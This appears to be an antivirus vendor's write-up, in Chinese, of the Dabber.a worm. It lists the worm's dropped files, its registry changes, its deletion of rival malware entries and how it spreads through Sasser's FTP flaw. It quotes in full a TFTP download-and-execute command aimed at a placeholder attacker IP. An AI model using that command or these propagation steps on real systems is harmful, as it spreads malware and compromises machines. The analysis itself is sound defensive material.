I-Worm/Dabber.a

I-Worm/Dabber.a

影響平台：Win2000/XP

I-Worm/Dabber.a是用C++編寫並經UPX壓縮過的網路蠕蟲，通過利用震盪波及其變種的FTP服務組件弱點進行傳播，在感染的計算機上安裝後門進行監聽。

1.複製自身：

%System%\package.exe

%Documents and Settings%\All Users\Start Menu\Programs\Startup\package.exe

%Windir%\All Users\Main menu\Programs\StartUp\package.exe

2.修改註冊表：

/添加鍵值："sassfix"="%System%\package.exe"

到註冊表：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

/刪除註冊表:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

下的鍵值：

Video

Microsoft Update

/刪除註冊表：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

下的鍵值：

Drvddll.exe

Drvddll_exe

drvsys

drvsys.exe

ssgrate

ssgrate.exe

lsasss

lsasss.exe

avserve2.exe

avvserrve32

avserve

Taskmon

Gremlin

/刪除註冊表：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

HKEY_CURRENT_USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

下的鍵值；

Window

Video Process

TempCom

SkynetRevenge

MapiDrv

BagleAV

System Updater Service

soundcontrl

WinMsrv32

navapsrc.exe

skynetave.exe

Generic Host Service

Windows Drive Compatibility

windows

/刪除註冊表：HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32\

下的值：(Default)

3..此蠕蟲在連線埠5554掃描感染震盪波及其變種病毒系統的IP位址，然後利用FTP服務組件漏洞傳送一個Windows shell命令到連線埠8967，並在此執行命令：下載並安裝蠕蟲副本。

命令內容：tftp -i [attacker's IP] GET hello.all package.exe & package.exe & exit

4.在感染的計算機上設定TFTP服務用來下載運行package.exe檔案並打開連線埠9898，此外還試圖連線到目的計算機的9898連線埠，用來檢查利用漏洞是否已經成功。

註：%Windir%為變數，一般為C:\Windows 或 C:\Winnt；

%System%為變數，一般為C:\Windows\System (Windows 95/98/Me),

C:\Winnt\System32 (Windows NT/2000),

或 C:\Windows\System32 (Windows XP)。